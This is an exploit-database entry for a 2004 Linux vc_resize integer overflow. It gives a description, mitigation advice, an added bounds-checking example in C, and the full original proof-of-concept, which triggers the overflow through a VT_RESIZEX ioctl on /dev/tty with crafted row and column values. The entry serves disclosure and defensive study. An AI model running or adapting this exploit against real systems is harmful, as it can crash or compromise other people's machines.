vendor:
by: Georgi Guninski
CVSS: 5.5 MEDIUM
CWE: 190 (Integer Overflow)
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2004

vc_resize int overflow

This exploit takes advantage of an integer overflow vulnerability in the vc_resize function. It sets vv.v_rows to 65535 and vv.v_cols to 32769, values chosen so that an overflow occurs on i386 systems, leading to a potential security breach. The code opens the /dev/tty device with the open system call and then calls ioctl with the VT_RESIZEX command to trigger the vulnerability. Before the ioctl it runs sync through system() so that all pending disk writes are completed first. Finally, a while loop prints the ;) string 4242 times. This exploit was published on milw0rm.com on December 16, 2004.

Mitigation:

To mitigate this vulnerability, apply patches or updates provided by the vendor. Restricting access to the vulnerable function or device may also help prevent exploitation.
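
Why the two values in the code below wrap, and what a bounds check on the resize request looks like, as an added example (not code from the original page or from the kernel). It assumes the screen buffer size is computed as rows * cols * 2 bytes in 32-bit arithmetic; the function names and CELL_BYTES are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumption for this example: each screen cell takes 2 bytes. */
#define CELL_BYTES 2u

/* Unchecked size computation in 32-bit arithmetic: wraps silently. */
uint32_t screen_bytes_unchecked(uint16_t rows, uint16_t cols)
{
    uint32_t row_bytes = (uint32_t)cols * CELL_BYTES;
    return row_bytes * rows;            /* may wrap modulo 2^32 */
}

/* Checked version: computes in 64 bits and rejects anything that would
 * not fit the 32-bit size. Returns 0 and stores the size, or -1. */
int screen_bytes_checked(uint16_t rows, uint16_t cols, uint32_t *out)
{
    uint64_t total;

    if (rows == 0 || cols == 0)
        return -1;
    total = (uint64_t)rows * cols * CELL_BYTES;
    if (total > UINT32_MAX)
        return -1;
    *out = (uint32_t)total;
    return 0;
}

int main(void)
{
    /* First pair: the v_rows / v_cols values from the page.
     * Second pair: a constructed, ordinary 25x80 text console. */
    const uint16_t dims[][2] = { {65535, 32769}, {25, 80} };
    size_t i;

    for (i = 0; i < sizeof(dims) / sizeof(dims[0]); i++) {
        uint32_t size = 0;
        int rc = screen_bytes_checked(dims[i][0], dims[i][1], &size);
        printf("%ux%u unchecked=%u checked=%s\n",
               (unsigned)dims[i][0], (unsigned)dims[i][1],
               (unsigned)screen_bytes_unchecked(dims[i][0], dims[i][1]),
               rc == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```

Under that assumption the requested size is 4295032830 bytes, which wraps to 65534 in 32 bits, so a buffer sized from the wrapped value is far smaller than the dimensions the caller asked for.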

Exploit-DB raw data:

/* vc_resize int overflow
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases
 * */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>

int main(int ac, char **av)
{
    int fd;
    struct vt_consize vv;
    int cou=4242;

    fd=open("/dev/tty",O_RDWR);
    if (fd<0) {perror("open");return -42;}
    memset(&vv,0,sizeof(vv));
    vv.v_clin=0;
    vv.v_vcol=0;
    vv.v_ccol=0;

    /* magic values, overflow on i386*/
    vv.v_rows=65535;
    vv.v_cols=32769;

    system("sync");
    if (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror("ioctl");return -4242;}
    while(cou--) printf(";)\n");
    close(fd);
    return 42;
}

// milw0rm.com [2004-12-16]